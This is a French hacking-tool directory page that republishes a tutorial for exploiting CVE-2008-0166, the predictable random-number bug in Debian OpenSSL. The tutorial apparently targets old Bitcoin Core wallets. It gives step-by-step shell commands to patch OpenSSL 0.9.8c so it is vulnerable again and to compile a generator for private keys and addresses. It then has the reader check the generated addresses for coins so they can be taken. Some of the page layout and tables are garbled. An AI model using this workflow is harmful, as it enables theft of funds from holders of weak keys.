Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/demining/vulnerable-to-debian-openssl-bug-cve-2008-0166
Analyse des VulnérabilitésExploitationCryptographieArticles et RechercheApprentissage et ÉducationRessources Organisées
GitHubdemining/vulnerable-to-debian-openssl-bug-cve-2008-0166

Vulnerable-to-Debian-OpenSSL-bug-CVE-2008-0166

Rechercher des pièces BTC dans les versions antérieures de Bitcoin Core avec la vulnérabilité critique OpenSSL 0.9.8 CVE-2008-0166

Voir le dépôtSite web
9234il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Recherche de pièces BTC sur les anciennes versions de Bitcoin Core avec la vulnérabilité critique OpenSSL 0.9.8 CVE-2008-0166

Dans cet article, nous allons créer un outil qui générera des adresses Bitcoin (P2PKH) en utilisant la vulnérabilité CVE-2008-0166. Il s'agit d'un projet de recherche pour trouver des pièces BTC sur les anciennes versions du client logiciel Bitcoin Core.

Générateur de nombres aléatoires qui génère  des nombres prévisibles  CVE-2008-0166

VAIM-OpenSSL 0.9.8/1.0.0 Détecté

La version vulnérable critique  OpenSSL 0.9.8 CVE-2008-0166  n'était peuplée que par l'ID de processus. En raison des différences d'endianness et de sizeof(long), la sortie dépend de l'architecture :  32 bits big-endian (par exemple,  i386),  64 bits big-endian (par exemple,  amd64, ia64),  32 bits big-endian (par exemple, powerpc , sparc). PID 0 est le noyau, et   (  ) n'est pas atteint par le portage, il y avait donc    flux de nombres aléatoires possibles pour chaque architecture.

| Date de sortie | Version | Tout sera stocké dans le stockage de fichiers Google Drive «Ubuntu 18.04.5LTS» installation de g++ installation des paquets libgmp3-dev libmpfr-dev cryptodeepbtcgen créé avec succès ! Exécution de cryptodeepbtcgen Vérification de la clé privée sur le site bitaddress
PID_MAX
32768
32767
Recherche de pièces BTC sur les anciennes versions de Bitcoin Core avec la vulnérabilité critique OpenSSL 0.9.8 CVE-2008-0166

Le client logiciel Bitcoin Core utilise  OpenSSL. Plus précisément, il utilise une fonction  «EC_KEY_generate_key()» pour générer des adresses Bitcoin  (comme une clé)  pour recevoir des paiements. Les anciennes versions de Bitcoin Core génèrent et stockent  100  clés dans wallet.dat

Une nouvelle clé n'est générée que lors de la réception d'un paiement Bitcoin. Ainsi, le client logiciel Bitcoin Core maintient un pool de  100  clés Bitcoin inutilisées  (adresses). L'état du générateur de nombres aléatoires interne dépend des autres appels effectués à la bibliothèque  OpenSSL avant l'appel 'EC_KEY_generate_key()'. Éléments affectant l'état interne du RNG : «RAND_add(8)», «RAND_bytes(8)» и «RAND_bytes(32)».

La recherche a donc consisté à parcourir de nombreuses anciennes sources de Bitcoin pour découvrir quels appels ont affecté l'état interne du RNG avant l'appel  «EC_KEY_generate_key()». Le chemin d'appel change entre les versions du client logiciel Bitcoin Core

L'étude s'est concentrée sur les versions suivantes :

| Date de sortie | Version |

Notre objectif est de générer des clés privées pour chaque version du client logiciel Bitcoin Core, pour chaque architecture  (le32/le64), pour chaque ID de processus et pour les adresses Bitcoin  (P2PKH), en utilisant un nombre aléatoire issu d'une vulnérabilité critique. OpenSSL 0.9.8.

Au final, nous allons créer un générateur d'adresses Bitcoin  (P2PKH) et tout sera sauvegardé dans un fichier result.txt

Tout sera stocké dans le stockage de fichiers Google Drive

Rendre OpenSSL à nouveau vulnérable

Pour cela nous allons utiliser le  kit de distribution  «Ubuntu 18.04.5 LTS» de Google Colab

Recherche de pièces BTC sur les anciennes versions de Bitcoin Core avec la vulnérabilité critique OpenSSL 0.9.8 CVE-2008-0166

Nous avons précédemment enregistré  un tutoriel vidéo :  «TERMINAL dans Google Colab crée toutes les commodités pour travailler dans GITHUB»

Ouvrez Google Colab dans  Terminal [TerminalGoogleColab]

Exécutons la commande :

root@kitploit:~
cat /etc/lsb-release
"Ubuntu 18.04.5 LTS"

Allons  dans  le «CryptoDeepTools» dépôt   et examinons les détails

root@kitploit:~
git clone https://github.com/demining/CryptoDeepTools.git

cd CryptoDeepTools/05VulnerableOpenSSL/

ls -lh

Recherche de pièces BTC sur les anciennes versions de Bitcoin Core avec la vulnérabilité critique OpenSSL 0.9.8 CVE-2008-0166

Mettez à jour et installez  g++ libgmp3-dev libmpfr-dev

root@kitploit:~
apt-get update

sudo apt-get install g++ -y

installation de g++
root@kitploit:~
sudo apt-get install libgmp3-dev libmpfr-dev -y
Recherche de pièces BTC sur les anciennes versions de Bitcoin Core avec la vulnérabilité critique OpenSSL 0.9.8 CVE-2008-0166
installation des paquets libgmp3-dev libmpfr-dev

Afin de rendre  OpenSSL à nouveau vulnérable comme dans  CVE-2008-0166
Téléchargez  openssl-0.9.8c.tar.gz  et patchez les fichiers système

root@kitploit:~
wget https://ftp.openssl.org/source/old/0.9.x/openssl-0.9.8c.tar.gz
Recherche de pièces BTC sur les anciennes versions de Bitcoin Core avec la vulnérabilité critique OpenSSL 0.9.8 CVE-2008-0166
Recherche de pièces BTC sur les anciennes versions de Bitcoin Core avec la vulnérabilité critique OpenSSL 0.9.8 CVE-2008-0166
root@kitploit:~
tar xfz openssl-0.9.8c.tar.gz
Recherche de pièces BTC sur les anciennes versions de Bitcoin Core avec la vulnérabilité critique OpenSSL 0.9.8 CVE-2008-0166
root@kitploit:~
mv openssl-0.9.8c openssl-0.9.8c-vuln

cd openssl-0.9.8c-vuln

Recherche de pièces BTC sur les anciennes versions de Bitcoin Core avec la vulnérabilité critique OpenSSL 0.9.8 CVE-2008-0166
root@kitploit:~
ls -lh
Recherche de pièces BTC sur les anciennes versions de Bitcoin Core avec la vulnérabilité critique OpenSSL 0.9.8 CVE-2008-0166
root@kitploit:~
patch -p1 <../make-OpenSSL-0-9-8c-vulnerable-again.diff
Recherche de pièces BTC sur les anciennes versions de Bitcoin Core avec la vulnérabilité critique OpenSSL 0.9.8 CVE-2008-0166

Sur le système LE-64 nous utilisons :

root@kitploit:~
./Configure linux-x86_64 shared no-ssl2 no-ssl3 no-comp no-asm
Recherche de pièces BTC sur les anciennes versions de Bitcoin Core avec la vulnérabilité critique OpenSSL 0.9.8 CVE-2008-0166
root@kitploit:~
make depend all
Recherche de pièces BTC sur les anciennes versions de Bitcoin Core avec la vulnérabilité critique OpenSSL 0.9.8 CVE-2008-0166

Revenons au répertoire content/

root@kitploit:~
cd /

ls

Recherche de pièces BTC sur les anciennes versions de Bitcoin Core avec la vulnérabilité critique OpenSSL 0.9.8 CVE-2008-0166
root@kitploit:~
cd content/CryptoDeepTools/05VulnerableOpenSSL/

ls -lh

Recherche de pièces BTC sur les anciennes versions de Bitcoin Core avec la vulnérabilité critique OpenSSL 0.9.8 CVE-2008-0166

Compilation :

root@kitploit:~
gcc -o cryptodeepbtcgen cryptodeepbtc.c -I./openssl-0.9.8c-vuln/include -L./openssl-0.9.8c-vuln -lssl -lcrypto

ls -lh

cryptodeepbtcgen créé avec succès !
root@kitploit:~
LD_LIBRARY_PATH=./openssl-0.9.8c-vuln/ ./cryptodeepbtcgen -h
Recherche de pièces BTC sur les anciennes versions de Bitcoin Core avec la vulnérabilité critique OpenSSL 0.9.8 CVE-2008-0166

Toutes les versions prises en charge du client logiciel Bitcoin Core :

root@kitploit:~
LD_LIBRARY_PATH=./openssl-0.9.8c-vuln/ ./cryptodeepbtcgen -l
Recherche de pièces BTC sur les anciennes versions de Bitcoin Core avec la vulnérabilité critique OpenSSL 0.9.8 CVE-2008-0166
root@kitploit:~
crypto > LD_LIBRARY_PATH=./openssl-0.9.8c-vuln/ ./cryptodeepbtcgen -l
#0   - 0.3.24
#1   - 0.8.6-d
#2   - 0.8.6-qt
#3   - 0.9.1-d
#4   - 0.9.4-d
#5   - unknownA
#6   - unknownB
#7   - unknownC
#8   - unknownD
#9   - unknownE
#10  - unknownF
#11  - unknownG
#12  - unknownH
#13  - unknownI
#14  - unknownJ
#15  - unknownK
#16  - unknownA0
#17  - unknownA1
#18  - unknownA2
#19  - unknownA3
#20  - unknownA4
#21  - unknownB0
#22  - unknownB1
#23  - unknownB2
#24  - unknownB3
#25  - unknownC0
#26  - unknownC1
#27  - unknownC2
#28  - unknownD0
#29  - unknownD1
#30  - unknownD2
#31  - unknownD3
#32  - unknownD4
#33  - unknownD5
#34  - unknownE0
#35  - unknownA0x
#36  - unknownA1x
#37  - unknownA2x
#38  - unknownA3x
#39  - unknownA4x
#40  - unknownB0x
#41  - unknownB1x
#42  - unknownB2x
#43  - unknownB3x
#44  - unknownC0x
#45  - unknownC1x
#46  - unknownC2x
#47  - unknownD0x
#48  - unknownD1x
#49  - unknownD2x
#50  - unknownD3x
#51  - unknownD4x
#52  - unknownD5x
#53  - unknownE0x
crypto >

Exécution de cryptodeepbtcgen -n 32 -v 0 :

root@kitploit:~
LD_LIBRARY_PATH=./openssl-0.9.8c-vuln/ ./cryptodeepbtcgen -n 32 -v 0 >> result.txt
Exécution de cryptodeepbtcgen

Tout sera sauvegardé dans le stockage de fichiers  Google Drive sous forme de fichier texte result.txt

Recherche de pièces BTC sur les anciennes versions de Bitcoin Core avec la vulnérabilité critique OpenSSL 0.9.8 CVE-2008-0166

Vérification de la clé privée !

Vérification de la clé privée sur le site bitaddress

Ensuite, il reste à vérifier toutes les adresses Bitcoin générées pour la présence de pièces BTC, pour cela nous pouvons utiliser  le script Python :  bitcoin-checker.py

Source

Vidéo : https://youtu.be/zHkXups2I8k

Source : https://cryptodeeptech.ru/vulnerable-openssl


Adresse de don
♥ BTC1Lw2gTnMpxRUNBU85Hg4ruTwnpUPKdf3nV
♥ ETH0xaBd66CF90898517573f19184b3297d651f7b90bf
Télécharger l’outil